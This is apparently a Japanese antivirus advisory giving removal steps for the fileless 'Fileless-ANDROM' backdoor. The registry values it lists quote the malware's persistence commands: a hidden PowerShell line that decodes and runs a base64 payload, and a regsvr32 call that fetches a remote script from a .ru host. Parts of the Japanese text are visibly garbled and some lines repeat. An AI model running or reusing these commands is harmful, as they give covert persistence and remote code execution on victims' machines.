Fileless-ANDROM
ァイルを利用しないマルウェア
Windows
マルウェアタイプ:
バックドア型
破壊活动の有无:
なし
暗号化:
感染報告の有無 :
はい
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を无効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手顺中に记载されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である场合の他、オペレーティングシステム(翱厂)の条件によりインストールがされない场合が考えられます。手顺中に记载されたファイル/フォルダ/レジストリ情报が确认されない场合、该当の手顺の操作は不要ですので、次の手顺に进んでください。
手順 3
奥颈苍诲辞飞蝉をセーフモードで再起动します。
手順 4
以下のレジストリ値を削除します。
警告:レジストリは奥颈苍诲辞飞蝉の构成情报が格纳されているデータベースであり、レジストリの编集内容に问题があると、システムが正常に动作しなくなる场合があります。
レジストリの编集はお客様の责任で行っていただくようお愿いいたします。弊社ではレジストリの编集による如何なる问题に対しても补偿いたしかねます。レジストリの编集前にこちらをご参照ください。
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- {UID} = "%System%\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\{random character}').{random character})));"
- {UID} = "%System%\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\{random character}').{random character})));"
- In HKEY_CURRENT_USER\Software\Classes\{random characters}
- {random characters} = {base 64 encoded powershell command}
- {random characters} = {base 64 encoded powershell command}
- In HKEY_CURRENT_USER\Software\Classes\{random characters}
- {UID} = {encrypted binary data}
- {UID} = {encrypted binary data}
- In HKEY_CURRENT_USER\Console\%SystemRoot%\_system32_WIndowsPowerShell_v1.0_powershell.exe
- WindowPosition = 4294905760
- WindowPosition = 4294905760
- In HKEY_CURRENT_USER\Console\%SystemRoot%\_system32_WIndowsPowerShell_v1.0_powershell.exe
- ScreenBufferSize = 65616
- ScreenBufferSize = 65616
- In HKEY_CURRENT_USER\Console\%SystemRoot%\_system32_WIndowsPowerShell_v1.0_powershell.exe
- WindowSize = 65616
- WindowSize = 65616
- In HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Run
- COM+ = "regsvr32 /s /n /u /i:http://{BLOCKED}2.{BLOCKED}3bw.ru/restore.xml scrobj.dll"
- COM+ = "regsvr32 /s /n /u /i:http://{BLOCKED}2.{BLOCKED}3bw.ru/restore.xml scrobj.dll"
手順 5
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Fileless-ANDROM」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。